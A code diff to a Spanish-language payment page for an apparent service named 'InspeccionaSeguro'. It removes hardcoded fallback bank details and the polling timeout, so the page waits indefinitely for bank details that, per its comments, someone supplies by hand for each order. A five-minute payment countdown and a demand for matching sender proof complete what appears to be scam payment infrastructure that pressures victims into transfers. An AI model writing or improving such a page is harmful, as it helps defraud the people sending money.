--- a/public/index.html
+++ b/public/index.html
@@ -1181,38 +1181,36 @@
                         (0 intentos)</p>
                 </div>
 
-                <div id="bank-details-box" class="bank-details-box">
+                <div id="bank-details-box" class="bank-details-box" style="display: none;">
                     <h3 style="margin-bottom: 20px; color: var(--text-dark);">Datos de Transferencia Bancaria (SEPA)
                     </h3>
                     <div class="bank-grid">
                         <div><strong>Nombre del Banco:</strong></div>
-                        <div id="bank-name">InspeccionaSeguro International</div>
+                        <div id="bank-name"></div>
 
                         <div><strong>IBAN:</strong></div>
-                        <div id="bank-iban" style="font-family: monospace; font-size: 1.1rem; word-break: break-all;">
-                            DE89 3704 0044
-                            0532 0130 00</div>
+                        <div id="bank-iban" style="font-family: monospace; font-size: 1.1rem; word-break: break-all;"></div>
 
                         <div><strong>BIC / SWIFT:</strong></div>
-                        <div id="bank-bic">COBADEFFXXX</div>
+                        <div id="bank-bic"></div>
 
                         <div><strong>Titular de la Cuenta:</strong></div>
-                        <div id="bank-holder">InspeccionaSeguro Inc.</div>
+                        <div id="bank-holder"></div>
 
                         <div><strong>Referencia:</strong></div>
-                        <div id="payment-ref" style="font-weight: 700; color: var(--primary-yellow);">IS-8842-XJ</div>
+                        <div id="payment-ref" style="font-weight: 700; color: var(--primary-yellow);"></div>
 
                         <div><strong>Cantidad:</strong></div>
                         <div id="bank-amount-display" style="font-weight: 700;">€0.00</div>
                     </div>
                 </div>
 
-                <div class="timer-box" id="timer-box">
+                <div class="timer-box" id="timer-box" style="display: none;">
                     <p style="margin-bottom: 10px; font-size: 0.9rem; color: #ccc;">Complete el pago en:</p>
                     <div class="timer-display" id="timer">05:00</div>
                 </div>
 
-                <div class="verification-box" id="verification-box">
+                <div class="verification-box" id="verification-box" style="display: none;">
                     <h3 style="margin-bottom: 15px; color: var(--text-dark);">Verificar Pago</h3>
                     <p style="margin-bottom: 20px; font-size: 0.9rem; color: #666;">Suba su comprobante de pago a
                         continuación. El nombre del remitente DEBE coincidir con el propietario registrado.</p>
@@ -1525,17 +1523,12 @@
                     pollAttempts = 0;
                     startPollingForBankDetails();
                 } else {
-                    throw new Error('API error');
+                    console.error("❌ API returned error:", data);
+                    // Keep waiting - do not show any fallback
                 }
             } catch (error) {
                 console.error("❌ Error sending order:", error);
-                showPaymentUI({
-                    bank: "InspeccionaSeguro International",
-                    iban: "DE89 3704 0044 0532 0130 00",
-                    bic: "COBADEFFXXX",
-                    holder: "InspeccionaSeguro Inc.",
-                    ref: orderReference
-                });
+                // Keep waiting - do not show any fallback
             }
         }
 
@@ -1580,7 +1573,7 @@
             }
         }
 
-        // Start polling
+        // Start polling - continues indefinitely until bank details received
         function startPollingForBankDetails() {
             if (pollingInterval) {
                 clearInterval(pollingInterval);
@@ -1600,21 +1593,7 @@
                 }, POLL_INTERVAL_MS);
             });
 
-            setTimeout(() => {
-                if (pollingInterval) {
-                    clearInterval(pollingInterval);
-                    pollingInterval = null;
-                    console.log("⏱️ Polling timeout reached");
-
-                    showPaymentUI({
-                        bank: "InspeccionaSeguro International",
-                        iban: "DE89 3704 0044 0532 0130 00",
-                        bic: "COBADEFFXXX",
-                        holder: "InspeccionaSeguro Inc.",
-                        ref: orderReference
-                    });
-                }
-            }, 5 * 60 * 1000);
+            // No timeout - keeps polling until you reply
         }
 
         function updatePollCountDisplay() {
